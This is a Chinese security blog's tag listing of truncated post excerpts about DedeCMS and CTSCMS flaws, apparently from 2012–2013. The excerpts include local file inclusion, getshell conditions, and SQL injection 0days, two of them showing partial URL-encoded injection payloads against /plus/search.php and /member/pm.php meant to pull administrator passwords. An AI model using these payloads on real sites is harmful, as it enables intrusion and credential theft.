标签 dede 下的文章

CTSCMS 最新漏洞

中国旅游服务网站管理系统(CTSCMS.COM)是专业的旅游网站程序源码、旅游网站系统、旅游网站模板、旅游网站建设服务提供商,专注于旅游电子商务发展的服务于旅行社和旅游。。。好吧~CTSCMS 其实就是使用织梦的模版,然后就是自己的商业版了~居然还有出500大洋去购买的查看更新日期 data/admin/ver.txt 一般都是2010年的,或许还可以直接getshellexp: [php]...

没穿底裤 2013 年 05 月 03 日 暂无评论

dedecms本地文件包含及物理路径泄露0day

作者:b4dboy 漏洞发现日期:2013-3-27 出现漏洞的两个文件为: Include/payment/alipay.php Include/payment/yeepay.php 漏洞均出现在respond方法里,估计这两个文件是临时工写的。Include/payment/alipay.php...... function respond() { ...

没穿底裤 2013 年 03 月 29 日 1 条评论

dedecms鸡肋getshell

一枚gpc off的getshell,一枚管理员修改了某个配置的getshell,唉,都是鸡肋!gpc off 的getshell [php]/member/soft_add.php156 if($softurl1!='') 157 { 158 $urls .= "{dede:link islocal='1' text='{$servermsg1}'} ...

没穿底裤 2013 年 03 月 02 日 暂无评论

Dedecms 搜索注射0day (/plus/search.php)

[php]http://www.0day5.com /plus/search.php?keyword=11&typeArr[%60@%27%60%20and%28SELECT/**/1%20FROM%28select/**/count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27%27*/concat%280x5f,u...

没穿底裤 2013 年 01 月 16 日 暂无评论

DedeCMS会员中心短消息SQL注射0day漏洞

发布日期:2012-12-30 发布作者:c4rp3nt3r漏洞类型:SQL注入漏洞描述:需要:magic_quotes_gpc = OffDedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码等看到微博上有人提了下,偶也发鸡肋了.[php]http://www.0day5.com/member/pm.php?dopost=read&id=1%27%20and%2...

没穿底裤 2013 年 01 月 03 日 1 条评论

DedeCMS会员中心好友分组设置SQL注射0day漏洞

发布日期:2012-12-30 发布作者:c4rp3nt3r漏洞类型:SQL注入漏洞描述:需要magic_quotes_gpc = OffDedeCMS会员中心好友分组设置SQL注射0day漏洞,成功利用该漏洞可获得管理员密码 都发出来吧,这种东西也算什么漏洞阿.其实对dedecms来说POST的数据同样可以GET提交,只是隐蔽点.利用代码如下:Exploit:http://www.0day...

没穿底裤 2013 年 01 月 03 日 暂无评论